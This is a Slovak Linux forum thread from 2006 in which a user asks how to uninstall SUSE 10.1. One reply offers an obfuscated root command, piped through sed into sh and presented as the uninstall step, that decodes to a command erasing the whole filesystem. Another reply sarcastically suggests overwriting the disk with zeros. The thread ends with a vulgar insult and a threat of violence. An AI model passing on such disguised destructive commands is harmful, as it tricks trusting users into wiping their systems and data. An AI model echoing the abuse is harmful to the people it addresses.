suse uninstall

Sekcia: Aplikácie & Desktop 24.12.2006 | 22:11
mato   Návštevník
chcem odinštalovať suse10.1.čital som že si mam vytvoriť záchrannu disketu-tu mi samozrejme nechce vytvoriť.može mi niekto poradiť ako sa toho linuxu zbaviť?už som to skúšal ale potom mi vyhodilo na monitore "Grub loading...."tak som ho dal späť. ak ma niekto presý návod napíste nech už to dám konečne preč.dik
    • Re: suse uninstall 21.12.2006 | 00:21
      Srigi   Návštevník
      Ako root napis do konzole toto a mas odinstalovane: echo @O \)@^ k | sed 's/@/r/gi' | sed 'y/)Ok^/\-m\/f/' |sh
      • Re: Re: suse uninstall 21.12.2006 | 00:29
        Avatar uid0 Debian  Používateľ
        to sa dost blbo pamata. okrem toho to moze niekomu nepozornemu zmazat aj particie co nechce zmazat (napr. tu s windowsom :)).
        Debian. apt-get into it…
      • Re: Re: suse uninstall 22.12.2006 | 18:36
        Avatar mkub Debian stable  Používateľ
        k tomuto si ako prisiel? ved staci iba vo win obnovit MBR, ale doporucujem zazalohovat udaje z HDD, lebo cert nikdy nespi. Ak mas Win9x skus pouzit fdisk a vo Win2k a WinXP: FIXMBR a potom FIXBOOT C:, kde C: je disk, kde mas nainstalovany Win. Ale je to vyskusane po nabootovani z instalacneho CD. A hlavne, si zazalohuj tie udaje!
        • Re: Re: Re: suse uninstall 22.12.2006 | 19:00
          Avatar magnum.44   Používateľ
          ale windows tam už nemám iba ten linux.čital som že mam vytvorit disketu a spustit z nech ale nechce mi ju urobit.už ma to riadne vytaca
          • Re: Re: Re: Re: suse uninstall 23.12.2006 | 15:14
            WlaSaTy   Návštevník
            aha, takze ty mas vlastne problem nie s odinstalovanim os, ale s jeho nainstalovanim. myslim ze to patri do fora pre ten operacny system, ktory chces nainstalovat. nieco mi vsak hovori ze lin/ux to nebude. ak tam nemas data tak skus: cat /dev/zero > /dev/hda spolahlivo ti to zlikviduje moznost zachrany tvojich dat a umozni nainstalovat akykolvek iny operacny system. ps.: to sa uz predavaju kompy s predinstalovanym suse?
            • Re: Re: Re: Re: Re: suse uninstall 24.12.2006 | 22:11
              makaveli   Návštevník
              za takéto kecy by som ti vykopol kolenom 5zubov z palice ty kurva arogantná!kolko más 50kg/okuliare/sedis 15hod za pc a sekas frajera
      • Re: Re: suse uninstall 23.12.2006 | 18:04
        root   Návštevník
        super rada,.. si fakt guru (dalsi arogantny rtfm master)